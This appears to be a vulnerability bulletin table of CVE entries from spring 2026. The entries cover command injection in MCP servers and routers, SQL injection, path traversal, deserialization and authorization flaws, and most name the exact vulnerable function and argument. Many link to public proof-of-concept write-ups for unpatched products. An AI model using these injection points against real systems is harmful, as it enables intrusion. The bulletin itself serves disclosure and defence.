| kleneway--awesome-cursor-mpc-server | A flaw has been found in kleneway awesome-cursor-mpc-server up to 2.0.1. Impacted is the function runCodeReviewTool of the file src/tools/codeReview.ts of the component Ccode-Review Tool. Executing a manipulation can lead to command injection. The attack may be launched remotely. The exploit has been published and may be used. The project was informed of the problem early through a pull request but has not reacted yet. | 2026-05-02 | 6.3 | CVE-2026-7629 | VDB-360575 | kleneway awesome-cursor-mpc-server Ccode-Review Tool codeReview.ts runCodeReviewTool command injection VDB-360575 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806470 | kleneway awesome-cursor-mpc-server <=2.0.1 Command Injection https://github.com/kleneway/awesome-cursor-mpc-server/issues/6 https://github.com/kleneway/awesome-cursor-mpc-server/pull/14 https://github.com/user-attachments/files/26019723/awesome-cursor-mpc-server_bug.pdf https://github.com/kleneway/awesome-cursor-mpc-server/ |
| Totolink--N300RH | A vulnerability was identified in Totolink N300RH 6.1c.1353_B20190305. This impacts the function setUploadSetting of the file /cgi-bin/cstecgi.cgi. Such manipulation of the argument FileName leads to file inclusion. The attack may be performed from remote. The exploit is publicly available and might be used. | 2026-05-02 | 6.5 | CVE-2026-7633 | VDB-360579 | Totolink N300RH cstecgi.cgi setUploadSetting file inclusion VDB-360579 | CTI Indicators (IOB, IOC, IOA) Submit #806597 | TOTOLINK N300RH_V4 V6.1c.1353_B20190305 External Control of System or Configuration Setting https://github.com/xyh4ck/iot_poc/tree/main/TOTOLINK/N300RHv4/03_setUploadSetting_ECFNP https://www.totolink.net/ |
| pskill9--website-downloader | A vulnerability was detected in pskill9 website-downloader up to 0.1.0. This affects the function download_website of the file src/index.ts of the component MCP Interface. Performing a manipulation of the argument outputPath results in os command injection. The attack may be initiated remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-02 | 6.3 | CVE-2026-7642 | VDB-360754 | pskill9 website-downloader MCP index.ts download_website os command injection VDB-360754 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806812 | pskill9 website-downloader Commit 5b399bebad1800ac6df5052b63eaea37117092b6 Command Injection https://github.com/pskill9/website-downloader/issues/7 https://github.com/BruceJqs/public_exp/issues/31 https://github.com/pskill9/website-downloader/ |
| ruvnet--sublinear-time-solver | A vulnerability was found in ruvnet sublinear-time-solver 1.5.0. Affected by this vulnerability is the function export_state of the file src/consciousness-explorer/mcp/server.js of the component MCP Interface. The manipulation results in path traversal. The attack can be executed remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-02 | 6.5 | CVE-2026-7645 | VDB-360757 | ruvnet sublinear-time-solver MCP server.js export_state path traversal VDB-360757 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806895 | ruvnet sublinear-time-solver / consciousness-explorer sublinear-time-solver 1.5.0, consciousness-explorer 1.1.1, commit 1210646955f33abe5c91f894cc7b04d024f62408 Path Traversal https://github.com/ruvnet/sublinear-time-solver/issues/19 https://github.com/ruvnet/sublinear-time-solver/ |
| r-huijts--mcp-server-rijksmuseum | A security flaw has been discovered in r-huijts mcp-server-rijksmuseum up to 1.0.4. Affected is the function open_image_in_browser of the file src/index.ts of the component MCP Interface. Performing a manipulation of the argument imageUrl results in os command injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-02 | 6.3 | CVE-2026-7653 | VDB-360778 | r-huijts mcp-server-rijksmuseum MCP index.ts open_image_in_browser os command injection VDB-360778 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806909 | r-huijts mcp-server-rijksmuseum 1.0.4 Command Injection https://github.com/r-huijts/rijksmuseum-mcp/issues/9 |
| youlaitech--youlai-boot | A security vulnerability has been detected in youlaitech youlai-boot up to 2.21.1. This affects the function getUserList of the file src/main/java/com/youlai/boot/system/controller/UserController.java of the component Users Endpoint. Such manipulation of the argument order leads to sql injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7672 | VDB-360825 | youlaitech youlai-boot Users Endpoint UserController.java getUserList sql injection VDB-360825 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800658 | youlaitech youlai-boot v2.21.1 SQL Injection https://fx4tqqfvdw4.feishu.cn/docx/EBZLdUqt4ogm4Px7jxuck1RQnHe?from=from_copylink |
| YunaiV--yudao-cloud | A vulnerability was identified in YunaiV yudao-cloud up to 2026.01. This affects the function getDataBySQL of the file yudao-module-report-biz/src/main/java/io/github/ruoyi/report/service/impl/GoViewDataServiceImpl.java. Such manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7678 | VDB-360831 | YunaiV yudao-cloud GoViewDataServiceImpl.java getDataBySQL sql injection VDB-360831 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800865 | YunaiV yudao-cloud yudao-cloud up to 2026.01 SQL Injection https://github.com/9str0IL/CVE/issues/2 |
| jsbroks--COCO Annotator | A security vulnerability has been detected in jsbroks COCO Annotator up to 0.11.1. Affected by this vulnerability is an unknown functionality of the file backend/webserver/api/datasets.py of the component Dataset API. The manipulation of the argument DatasetId leads to authorization bypass. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.5 | CVE-2026-7681 | VDB-360834 | jsbroks COCO Annotator Dataset API datasets.py authorization VDB-360834 | CTI Indicators (IOB, IOC, IOA) Submit #801408 | jsbroks COCO Annotator 0.11.1 Authorization Bypass https://github.com/natanmorette-thoropass/thoropass-vuln-research-program/tree/main/2026/Unauthenticated%20Dataset%20Modification%20via%20Missing%20Authentication |
| Edimax--BR-6208AC | A security flaw has been discovered in Edimax BR-6208AC 1.02. The impacted element is the function setWAN of the file /goform/setWAN of the component L2TP Mode. The manipulation of the argument L2TPUserName results in command injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7682 | VDB-360841 | Edimax BR-6208AC L2TP Mode setWAN command injection VDB-360841 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #801572 | Edimax BR-6208AC V2_1.02 Command Injection https://tzh00203.notion.site/Edimax-BR-6208AC-V2-1-02-setWAN-L2TPUserName-Command-Injection-33db5c52018a80c1b3aac6db8927bd0f |
| Edimax--BR-6428nC | A weakness has been identified in Edimax BR-6428nC up to 1.16. This affects an unknown function of the file /goform/setWAN of the component Web Interface. This manipulation of the argument pppUserName/pptpUserName causes command injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7683 | VDB-360842 | Edimax BR-6428nC Web setWAN command injection VDB-360842 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #801597 | Edimax BR-6428nC v1.16 v1.16 Command Injection Submit #801598 | Edimax BR-6428nC v1.16 v1.16 Command Injection (Duplicate) https://tzh00203.notion.site/Edimax-BR-6428nC-v1-16-setWAN-pppUserName-Command-Injection-33db5c52018a80dab299ef508e810d00 https://tzh00203.notion.site/Edimax-BR-6428nC-v1-16-setWAN-pptpUserName-Command-Injection-33db5c52018a80949cfbcc2091340c80 |
| langflow-ai--langflow | A vulnerability was determined in langflow-ai langflow up to 1.8.4. Affected by this issue is the function CodeParser.parse_callable_details of the file src/lfx/src/lfx/custom/code_parser/code_parser.py of the component Full Builtins Module Handler. Executing a manipulation can lead to command injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7687 | VDB-360857 | langflow-ai langflow Full Builtins code_parser.py CodeParser.parse_callable_details command injection VDB-360857 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #798731 | langflow-ai langflow 1.8.4 Command Injection https://www.yuque.com/yuqueyonghuqy8yu4/ghuay4/ylrgoyyfrucp8opo?singleDoc=#g4kyb |
| Wavlink--WL-WN570HA1 | A weakness has been identified in Wavlink WL-WN570HA1 R70HA1 V1410_221110. This issue affects the function set_sys_adm of the file /cgi-bin/adm.cgi. This manipulation of the argument Username causes command injection. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. Once again the vendors acted very professional and confirms, "that the WN570HA1 firmware version R70HA1 V1410_221110 has been removed from our website." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-03 | 6.3 | CVE-2026-7690 | VDB-360860 | Wavlink WL-WN570HA1 adm.cgi set_sys_adm command injection VDB-360860 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807805 | Wavlink WN570HA1 WL-WN570HA1 221110 Command Injection https://lavender-bicycle-a5a.notion.site/Wavlink-WN570HA1-set_sys_adm-34753a41781f809d8043f0a7a3e07e50?source=copy_link |
| Wavlink--WL-WN570HA1 | A security vulnerability has been detected in Wavlink WL-WN570HA1 R70HA1 V1410_221110. Impacted is the function set_sys_cmd of the file /cgi-bin/adm.cgi. Such manipulation of the argument command leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. Once again the vendors acted very professional and confirms, "that the WN570HA1 firmware version R70HA1 V1410_221110 has been removed from our website." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-03 | 6.3 | CVE-2026-7691 | VDB-360861 | Wavlink WL-WN570HA1 adm.cgi set_sys_cmd command injection VDB-360861 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807806 | Wavlink WN570HA1 WL-WN570HA1 221110 Command Injection https://lavender-bicycle-a5a.notion.site/Wavlink-WN570HA1-set_sys_cmd-34753a41781f80ab88a1d95d4f798d1f?source=copy_link |
| Wavlink--WL-WN570HA1 | A vulnerability was detected in Wavlink WL-WN570HA1 R70HA1 V1410_221110. The affected element is the function ping_ddns of the file /cgi-bin/adm.cgi. Performing a manipulation of the argument DDNS results in command injection. The attack can be initiated remotely. The exploit is now public and may be used. Once again the vendors acted very professional and confirms, "that the WN570HA1 firmware version R70HA1 V1410_221110 has been removed from our website." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-03 | 6.3 | CVE-2026-7692 | VDB-360862 | Wavlink WL-WN570HA1 adm.cgi ping_ddns command injection VDB-360862 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807807 | Wavlink WN570HA1 WL-WN570HA1 221110 Command Injection https://lavender-bicycle-a5a.notion.site/Wavlink-WN570HA1-ping_ddns-34753a41781f80c0a6c6c1b09b7cdf1c?source=copy_link |
| Acrel Electrical--EEMS Enterprise Power Operation and Maintenance Cloud Platform | A vulnerability was found in Acrel Electrical EEMS Enterprise Power Operation and Maintenance Cloud Platform 1.3.0. This impacts an unknown function of the file /SubstationWEBV2/main/uploadH5Files. The manipulation of the argument File results in unrestricted upload. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7696 | VDB-360865 | Acrel Electrical EEMS Enterprise Power Operation and Maintenance Cloud Platform uploadH5Files unrestricted upload VDB-360865 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807944 | Acrel Electric Co., Ltd. EEMS Enterprise Power Operation and Maintenance Cloud Platform 1.3.0 Unrestricted Upload of File with Dangerous Type https://ucn9h68n9289.feishu.cn/wiki/X9PAw4i5kiPueKkZqCCcNVYZnnc?from=from_copylink |
| Dromara--MaxKey | A security flaw has been discovered in Dromara MaxKey up to 3.5.13. Affected by this issue is the function StrUtils.checkSqlInjection of the file StrUtils.java. Performing a manipulation of the argument filtersfields results in sql injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7699 | VDB-360868 | Dromara MaxKey StrUtils.java StrUtils.checkSqlInjection sql injection VDB-360868 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #804260 | Dromara MaxKey 3.5.13 SQL Injection https://github.com/xpp3901/CVE_APPLY/tree/main/V-M001_MaxKey_Filters_SQL_Injection |
| langflow-ai--langflow | A weakness has been identified in langflow-ai langflow up to 1.8.4. This affects the function eval of the file src/lfx/src/lfx/components/llm_operations/lambda_filter.p of the component LambdaFilterComponent. Executing a manipulation can lead to code injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7700 | VDB-360869 | langflow-ai langflow LambdaFilterComponent lambda_filter.p eval code injection VDB-360869 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #804305 | langflow-ai Langflow Desktop 1.8.3 Execution with Unnecessary Privileges https://www.yuque.com/mengnanbulalei/ognlsk/hte2a98ro5gf8tp9?singleDoc#%20%E3%80%8AFirst%20release%20of%20Langflow%201.8.3%20Smart%20Transform%20eval()/Lambda%20injection%20RCE%20vulnerability%20analysis+POC%E3%80%8B |
| JD Cloud--JDCOS | A flaw has been found in JD Cloud JDCOS 4.5.1.r4518. This vulnerability affects the function set_iptv_info of the file /jdcap of the component Service Interface. Executing a manipulation of the argument vid can lead to command injection. It is possible to launch the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7705 | VDB-360881 | JD Cloud JDCOS Service jdcap set_iptv_info command injection VDB-360881 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #805644 | jdcloud 京东云无线宝ER1 太乙 有线路由 千兆路由器 JDCOS-JDC08-4.5.1.r4518 Remote code execution https://www.notion.so/3430c75766a8802dbde3dc8a372c7f46 |
| janeczku--Calibre-Web | A vulnerability was identified in janeczku Calibre-Web up to 0.6.26. The impacted element is the function generate_auth_token of the file cps/kobo_auth.py of the component Endpoint. Such manipulation of the argument user_id leads to improper authorization. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7709 | VDB-360885 | janeczku Calibre-Web Endpoint kobo_auth.py generate_auth_token improper authorization VDB-360885 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #805823 | Janeczku Calibre-web V0.6.7-V0.6.26 IDOR in auth-token generation leading to account takeover / user https://drive.google.com/drive/folders/1rosrcfxcHrQM7_GOiBwzY_GnCfXoFuVR?usp=drive_link |
| n/a--MindsDB | A security vulnerability has been detected in MindsDB up to 26.01. Affected is the function pickle.loads of the component Pickle Handler. The manipulation leads to deserialization. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7712 | VDB-360888 | MindsDB Pickle pickle.loads deserialization VDB-360888 | CTI Indicators (IOB, IOC, IOA) Submit #806827 | https://github.com/mindsdb/mindsdb <=26.01 Remote Code Execution https://github.com/nn0nkey/JD-Security-SHENYI-Team/blob/main/MindsDB_Pickle_RCE.md |
| Merge--Merge PACS | Merge PACS 7.0 contains a cross-site request forgery vulnerability that allows attackers to perform unauthorized actions by crafting malicious HTML forms targeting the merge-viewer endpoint. Attackers can submit POST requests to /servlet/actions/merge-viewer/summary with login credentials to hijack user sessions and gain unauthorized access to the PACS system. | 2026-04-29 | 5.3 | CVE-2018-25298 | ExploitDB-44681 Official Product Homepage VulnCheck Advisory: Merge PACS 7.0 Cross-Site Request Forgery via merge-viewer |
| IBM--Db2 | IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.3 for Linux, UNIX and Windows (includes Db2 Connect Server) could allow an authenticated user to cause a denial of service due to improper neutralization of special elements in data query logic when certain configurations exist. | 2026-04-30 | 5.3 | CVE-2025-14688 | https://www.ibm.com/support/pages/node/7269424 |
| IBM--watsonx.data | IBM watsonx.data 2.2 through 2.3 IBM Lakehouse does not properly restrict communication between pods which could allow an attacker to transfer data between pods without restrictions. | 2026-04-30 | 5.3 | CVE-2025-36180 | https://www.ibm.com/support/pages/node/7270593 |
| Dell--Alienware Command Center (AWCC) | Dell Alienware Command Center (AWCC), versions prior to 6.13.8.0, contain a Least Privilege Violation vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of Privileges. | 2026-04-27 | 5.3 | CVE-2026-32655 | https://www.dell.com/support/kbdoc/en-us/000451018/dsa-2026-192-security-update-for-dell-alienware-command-center-6-x-for-multiple-vulnerabilities |
| Elastic--Elastic Package Registry | Improper Verification of Cryptographic Signature (CWE-347) in Elastic Package Registry could allow an attacker positioned to intercept network traffic, or to otherwise influence the contents served to a self-hosted registry, to substitute a tampered package without the integrity check failing closed. | 2026-04-28 | 5.9 | CVE-2026-33467 | https://discuss.elastic.co/t/elastic-package-registry-1-38-0-security-update-esa-2026-27/386081 |
| dokaninc--Dokan: AI Powered WooCommerce Multivendor Marketplace Solution Build Your Own Amazon, eBay, Etsy | The Dokan: AI Powered WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.1 via the '/dokan/v1/stores/{id}/reviews' REST API endpoint. This is due to the 'prepare_reviews_for_response' method including reviewer email addresses, usernames, and user IDs in the API response. This makes it possible for unauthenticated attackers to extract email addresses, usernames, and user IDs of all customers who left reviews on any vendor's store. The Pro version of the plugin must be installed and activated, with store reviews enabled, in order to exploit the vulnerability. | 2026-05-02 | 5.3 | CVE-2026-3504 | https://www.wordfence.com/threat-intel/vulnerabilities/id/02b0d7d7-8a10-48de-b1e1-7e1f1fda6ffe?source=cve https://plugins.trac.wordpress.org/browser/dokan-lite/trunk/includes/REST/StoreController.php#L125 https://plugins.trac.wordpress.org/browser/dokan-lite/trunk/includes/REST/StoreController.php#L835 https://plugins.trac.wordpress.org/browser/dokan-lite/trunk/includes/REST/StoreController.php#L854 https://plugins.trac.wordpress.org/changeset/3481799/ |
| n/a-- V2Board v1.7.4 | Sensitive server_token exposed via GET parameter in V2Board thru 1.7.4. In app/Http/Controllers/Server/UniProxyController.php, the server authentication token is accepted via GET parameter transmission. The token appears in URLs such as /api/v1/server/UniProxy/user?token=SECRET, causing it to be recorded in web server access logs, browser history, HTTP Referer headers, and proxy/CDN logs. An attacker who gains access to any log source can extract the token and impersonate a proxy server node, potentially intercepting all user traffic. | 2026-05-01 | 5.3 | CVE-2026-37504 | https://github.com/v2board/v2board https://gist.github.com/sgInnora/1330e1a82caa79906eec55eeff2c99b9 |
| complianz--Complianz GDPR/CCPA Cookie Consent | The Complianz - GDPR/CCPA Cookie Consent plugin for WordPress is vulnerable to unauthorized data access in all versions up to, and including, 7.4.5 This is due to the REST API endpoint at /wp-json/complianz/v1/consent-area/{post_id}/{block_id} using __return_true as the permission_callback, allowing any unauthenticated user to access it. The cmplz_rest_consented_content() function retrieves a post by ID via get_post() and returns the consentedContent attribute of any complianz/consent-area block found in it, without checking if the post is published or if the user has permission to read it. This makes it possible for unauthenticated attackers to read the consent area block content from private, draft, or unpublished posts. | 2026-04-29 | 5.3 | CVE-2026-4019 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3892489e-6ff7-4664-bb06-b8edff6dd659?source=cve https://github.com/complianz/complianz-gdpr/blob/64c09657bd028f62d7b50a54d83ca19b87df2cef/rest-api/rest-api.php#L61 https://plugins.trac.wordpress.org/browser/complianz-gdpr/tags/7.4.4.2/rest-api/rest-api.php#L54 https://plugins.trac.wordpress.org/browser/complianz-gdpr/tags/7.4.4.2/rest-api/rest-api.php#L61 https://plugins.trac.wordpress.org/changeset/3508713/complianz-gdpr/trunk/rest-api/rest-api.php https://plugins.trac.wordpress.org/changeset?old_path=%2Fcomplianz-gdpr/tags/7.4.5&new_path=%2Fcomplianz-gdpr/tags/7.4.6 |
| diplodoc-platform--@diplodoc/search-extension | @diplodoc/search-extension 1.0.0 through 3.x before 3.0.3 allows stored XSS via the title in a .md file. | 2026-05-01 | 5.4 | CVE-2026-40201 | https://github.com/diplodoc-platform/search-extension/releases https://github.com/diplodoc-platform/search-extension/pull/41 https://github.com/diplodoc-platform/search-extension/releases/tag/v3.0.3 https://github.com/eyelessgoddd/eyelessgoddd/blob/main/README.md |
| wproyal--Royal Addons for Elementor Addons and Templates Kit for Elementor | The Royal Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `wpr_update_form_action_meta` AJAX action in all versions up to, and including, 1.7.1056. The handler is registered on both `wp_ajax` and `wp_ajax_nopriv` hooks, making it accessible to unauthenticated users. Although a nonce is verified, the nonce (`wpr-addons-js`) is publicly exposed in frontend JavaScript via `WprConfig.nonce` on any page that loads Royal Addons widgets, rendering the protection ineffective. The endpoint also lacks any capability or ownership checks and directly calls `update_post_meta()` with user-controlled input on a whitelisted set of form action meta keys. This makes it possible for unauthenticated attackers to modify form action configuration metadata (email, submissions, Mailchimp, and webhook settings) on any post, potentially leading to webhook/email action tampering and data exfiltration via modified webhook URLs. | 2026-05-02 | 5.3 | CVE-2026-4024 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2ecec7d7-d1b2-4ccf-ade6-1f78224968c6?source=cve https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/classes/modules/forms/wpr-actions-status.php#L21 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1049/classes/modules/forms/wpr-actions-status.php#L21 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/classes/modules/forms/wpr-actions-status.php#L73 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1049/classes/modules/forms/wpr-actions-status.php#L73 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/plugin.php#L592 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1049/plugin.php#L592 |
| MIT--Kerberos 5 | In MIT Kerberos 5 (aka krb5) before 1.22.3, there is a NULL pointer dereference if an application calls gss_accept_sec_context() on a system with a NegoEx mechanism registered in /etc/gss/mech. An unauthenticated remote attacker can trigger this, causing the process to terminate in parse_nego_message. | 2026-04-28 | 5.9 | CVE-2026-40355 | https://web.mit.edu/kerberos/advisories/ https://cems.fun/2026/04/27/krb5-two-unauthenticated-network-vulnerabilities.html https://github.com/krb5/krb5/commit/2e75f0d9362fb979f5fc92829431a590a130929f |
| MIT--Kerberos 5 | In MIT Kerberos 5 (aka krb5) before 1.22.3, there is an integer underflow and resultant out-of-bounds read if an application calls gss_accept_sec_context() on a system with a NegoEx mechanism registered in /etc/gss/mech. An unauthenticated remote attacker can trigger this, possibly causing the process to terminate in parse_message. | 2026-04-28 | 5.9 | CVE-2026-40356 | https://web.mit.edu/kerberos/advisories/ https://cems.fun/2026/04/27/krb5-two-unauthenticated-network-vulnerabilities.html https://github.com/krb5/krb5/commit/2e75f0d9362fb979f5fc92829431a590a130929f |
| SmarterTools Inc.--SmarterMail | SmarterTools SmarterMail builds prior to 9610 contain a cryptographic weakness in the file and email sharing endpoints that use DES-CBC encryption with keys and initialization vectors derived from System.Random seeded with insufficient entropy, reducing the seed space to approximately 19,000 possible values. An unauthenticated attacker can use the attachment download endpoint as an oracle to determine the seed in use and derive encryption keys and initialization vectors to forge sharing tokens for arbitrary emails, attachments, or file storage contents without prior access to the targeted content. | 2026-04-27 | 5.9 | CVE-2026-40514 | https://www.smartertools.com/smartermail/release-notes/current https://www.vulncheck.com/advisories/smartertools-smartermail-build-9610-cryptographic-weakness-via-weak-rng |
| Exim--Exim | In Exim before 4.99.2, on systems using musl libc (not glibc), an attacker can crash the connection instance when malformed DNS data is present in PTR records. This is caused by a dn_expand oddity in octal printing. | 2026-04-30 | 5.9 | CVE-2026-40684 | https://www.openwall.com/lists/oss-security/2026/04/30/21 https://exim.org/static/doc/security/cve-2026-04.1/CVE2026-40684.assessment https://code.exim.org/exim/exim/commit/628bbaca7672748d941a12e7cd5f0122a4e18c81 https://exim.org/static/doc/security/CVE-2026-40684.txt |
| TRENDnet--TEW-821DAP | A vulnerability was detected in TRENDnet TEW-821DAP up to 1.12B01. The affected element is the function tools_diagnostic. The manipulation results in os command injection. The exploit is now public and may be used. The vendor explains: "That firmware version will only work on our hardware version v1.xR. We have already EOL that product 8 years ago and are no longer selling". This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-02 | 5.5 | CVE-2026-7608 | VDB-360565 | TRENDnet TEW-821DAP tools_diagnostic os command injection VDB-360565 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806215 | Trendnet TEW-821DAP v1.12B01 CWE-78 Improper Neutralization of Special Elements used in an OS https://github.com/IOTRes/IOT_Firmware_Update/blob/main/Trendnet/TEW-821DAP_CI1.md |
| code-projects--Online Hospital Management System | A vulnerability was found in code-projects Online Hospital Management System 1.0. The impacted element is an unknown function of the component Registration Handler. The manipulation of the argument Username results in improper authorization. The attack can be executed remotely. The exploit has been made public and could be used. | 2026-05-02 | 5.4 | CVE-2026-7631 | VDB-360577 | code-projects Online Hospital Management System Registration improper authorization VDB-360577 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806565 | Code-projects Online Hospital Management System V1.0 unauthorized access https://github.com/MyMySSS/CVE123/blob/main/cve2/cve2.md https://code-projects.org/ |
| appcheap--App Builder Create Native Android & iOS Apps On The Flight | The App Builder - Create Native Android & iOS Apps On The Flight plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to and including 5.6.0. This is due to missing authorization validation in the `upload_avatar()` function, which accepts an attacker-controlled `user_id` parameter from the POST request body and uses it to update user meta without verifying that the authenticated requester owns or has permission to modify the target account. This makes it possible for authenticated attackers, with Subscriber-level access and above, to overwrite the profile avatar of any arbitrary user on the site, including administrators, by supplying a target `user_id` in the request body to the `/wp-json/app-builder/v1/upload-avatar` endpoint. | 2026-05-02 | 5.3 | CVE-2026-7638 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2d532ffc-c6f1-41e3-9a59-0706802ab8e2?source=cve https://plugins.trac.wordpress.org/browser/app-builder/trunk/includes/Di/Service/Auth/UploadAvatar.php#L80 https://plugins.trac.wordpress.org/browser/app-builder/tags/5.6.0/includes/Di/Service/Auth/UploadAvatar.php#L80 https://plugins.trac.wordpress.org/browser/app-builder/trunk/includes/Di/Service/Auth/UploadAvatar.php#L161 https://plugins.trac.wordpress.org/browser/app-builder/tags/5.6.0/includes/Di/Service/Auth/UploadAvatar.php#L161 https://plugins.trac.wordpress.org/browser/app-builder/trunk/includes/Traits/Permission.php#L33 https://plugins.trac.wordpress.org/browser/app-builder/tags/5.6.0/includes/Traits/Permission.php#L33 https://plugins.trac.wordpress.org/browser/app-builder/tags/5.5.10/includes/Di/Service/Auth/UploadAvatar.php#L80 https://plugins.trac.wordpress.org/browser/app-builder/tags/5.5.10/includes/Di/Service/Auth/UploadAvatar.php#L161 https://plugins.trac.wordpress.org/browser/app-builder/tags/5.5.10/includes/Traits/Permission.php#L33 |
| sgl-project--SGLang | A vulnerability was detected in sgl-project SGLang up to 0.5.9. Impacted is the function get_tokenizer of the file python/sglang/srt/utils/hf_transformers_utils.py of the component HuggingFace Transformer Handler. The manipulation of the argument trust_remote_code with the input False as part of Boolean results in code injection. The attack can be executed remotely. A high complexity level is associated with this attack. The exploitability is considered difficult. In get_tokenizer(), when the caller passes trust_remote_code=False and HuggingFace transformers v5 returns a TokenizersBackend instance (the generic fallback for tokenizer classes not in the registry), SGLang silently re-invokes AutoTokenizer.from_pretrained with trust_remote_code=True, overriding the caller's explicit security setting. A model repository containing a malicious tokenizer.py referenced via auto_map in tokenizer_config.json will execute arbitrary Python in the SGLang process during this second call. No log line or warning is emitted. The override affects all current SGLang versions because transformers==5.3.0 is pinned in pyproject.toml. Both tokenizer_mode="auto" and tokenizer_mode="slow" are affected. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-02 | 5.6 | CVE-2026-7669 | VDB-360817 | sgl-project SGLang HuggingFace Transformer hf_transformers_utils.py get_tokenizer code injection VDB-360817 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #799263 | sgl-project sglang <=0.5.9 Protection Mechanism Failure https://github.com/gouldnicholas/CVE-2026-7669-PoC |
| eyeo--Adblock Plus | A vulnerability was found in eyeo Adblock Plus up to 4.36.2 on Chrome. Affected by this vulnerability is the function postMessage of the file premium.preload.js of the component Legacy Premium Activation. Performing a manipulation results in improper access controls. Remote exploitation of the attack is possible. The exploit has been made public and could be used. Upgrading the affected component is recommended. The vendor provides additional details: "The affected code path is a legacy Premium activation flow that has been deprecated. eyeo has already migrated to a new user account-based licensing system. The exploit does not grant permanent Premium access. The licensing server issues a short-lived trial license (valid for approximately 24 hours) for any submitted userId. On the next license check, the server validates against a real subscription and the trial expires if no valid subscription is found. The researcher's claim of permanently unlocking all Premium features is therefore incorrect. (...) The old flow has been present for years and has not been weaponized at scale to our knowledge. The risk to eyeo and to users is minimal." | 2026-05-03 | 5.3 | CVE-2026-7686 | VDB-360856 | eyeo Adblock Plus Legacy Premium Activation premium.preload.js postMessage access control VDB-360856 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #793551 | Eyeo GmbH Adblock Plus 4.36.2 Privilege Escalation https://github.com/xryj920/CVE/blob/main/adblock_plus_CVE_report.md https://adblockplus.org/en/download |
